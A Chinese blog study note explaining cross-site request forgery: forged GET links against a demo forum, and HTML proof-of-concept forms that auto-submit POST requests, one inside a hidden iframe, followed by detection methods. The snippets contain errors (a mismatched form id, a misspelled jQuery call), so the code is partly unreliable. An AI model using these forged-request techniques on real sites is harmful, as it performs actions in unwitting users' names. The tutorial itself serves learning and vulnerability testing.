CSRF学习

什么是CSRF

CSRF(Cross-site Request Forgery),跨站请求伪造。
是在正常用户不知情的条件下,Hacker将恶意请求伪造成该用户的请求发出的攻击。相当于是你的身份被盗用,攻击者可以以你的名义做很多事情,造成个人隐私泄露财产安全等问题。

原理

两个重点:

  • CSRF的攻击建立在浏览器与Web服务器的会话中;(原会话有效)
  • 欺骗用户访问恶意URL。

攻击场景

GET

假设www.csrfdemo.com是一个论坛平台,对它的关注功能进行抓包,对截取到的HTTP请求内容进行分析,发现在关注某个人时,url会变成:
http://www.csrfdemo.com/follow?uid=789254&follow=854632
其中,uid是用户的ID,follow是被关注者的ID。

那么构造url:
http://www.csrfdemo.com/follow?uid=482365&follow=854632
那么用户482365可以不通过Web应用程序,直接点击这个链接,他就关注了用户854632。
甚至直接构造如下url:
http://www.csrfdemo.com/follow?follow=854632
被其他用户点击之后,这些用户就会在他们不知情的情况下关注用户854632。

当然,如果发现该论坛发帖时url会变成:
http://www.csrfdemo.com/text?uid=xxxxxx&content=xxx
那么只要构造url:
http://www.csrfdemo.com/text?uid=854632&content=我是一个小胖子
当用户854632在未登出该论坛的条件下点击了这个url,他就会在非自愿的情况下,发出了一条标题为“我是一个小胖子”的帖子。(就很过分

POST

当开发人员把接收方式改为POST时,URL就不起作用了。但是其实也很很简单。
写一个HTML文档,构造一个form表单,利用JavaScript自动提交表单,这样只要打开这个HTML文档,就会自动提交POST数据,核心代码如下:

<form id="myForm" method="post" action="http://www.csrfdemo.com/follow">
    <input type="hidden" name="follow" value="854632">
 </form>
 
 <script>
    var myForm = document.getElementById("myfrom");
    myForm.submit();
</script>

在上面的代码中,action值代表打开这个HTML文档后会自动跳转到的页面。那么如果我们需要悄咪咪地不被用户察觉的情况下提交数据要怎么办呢?
方法一:使用AJAX
通过jquery-form插件提交请求,语法如下:
jQuert.post(url, data,success(data, textStatus, jqXHR), dataType)
其中,
url:请求所要发送到的URL;
data:请求中要发送到服务器的数据,可选;
success函数:请求成功时执行的回调函数,可选;
dataType:服务器相应的数据类型,可选。

方法二:指定form表单的target
这种方法我们需要将URL在<iframe>标签中打开,然后隐藏我们的<iframe>。核心代码如下:

<iframe frameborder="0" name="myIframe" width="0px" height="0px"></iframe>

<form id="myForm" method="post" target="myIframe" action="http://www.csrfdemo.com/follow">
    <input type="hidden" name="follow" value="854632">
 </form>
 
 <script>
    var myForm = document.getElementById("myfrom");
    myForm.submit();
</script>

漏洞检测

手工检测

关键点:CSRF实际上是劫持用户的正规操作进行攻击。
首先确定Web应用程序中的敏感操作,然后拦截相关HTTP请求,确定某操作(例如删除用户操作)的URL中各参数项的意义,然后编写CSRF POC验证该功能是否存在CSRF漏洞。
如果编写的POC被执行,则存在CSRF漏洞,否则不存在。

半自动检测

使用Burp Suite中的Scanner模块检测CSRF漏洞;
或者,使用OWASP组织提供的CSRF半自动检测工具:CSRFTester。

用法不清楚的,
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • http://www.91ri.org/tag/fuzz-bug 通常情况下,有三种方法被广泛用来防御CSRF攻击...
    jdyzm阅读 9,706评论 0 5
  • 0x01 CSRF攻击方式 一:HTML csrf攻击: 利用HTML元素发出GET请求带src属性的html标签...
    Pursu0e阅读 3,831评论 0 1
  • 一、简介 CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Clic...
    One_Hund阅读 3,728评论 0 0
  • 开发自定义控件的步骤:1、了解View的工作原理2、 编写继承自View的子类3、 为自定义View类增加属性4、...
    _奶瓶阅读 3,081评论 0 1
  • (1) 最近,同事刘姐做了胆结石手术,需要住院一周。之前我问她,谁来医院照顾你?她说我不需要照顾,一个小手术而已,...
    叶说心语阅读 2,976评论 0 4

友情链接更多精彩内容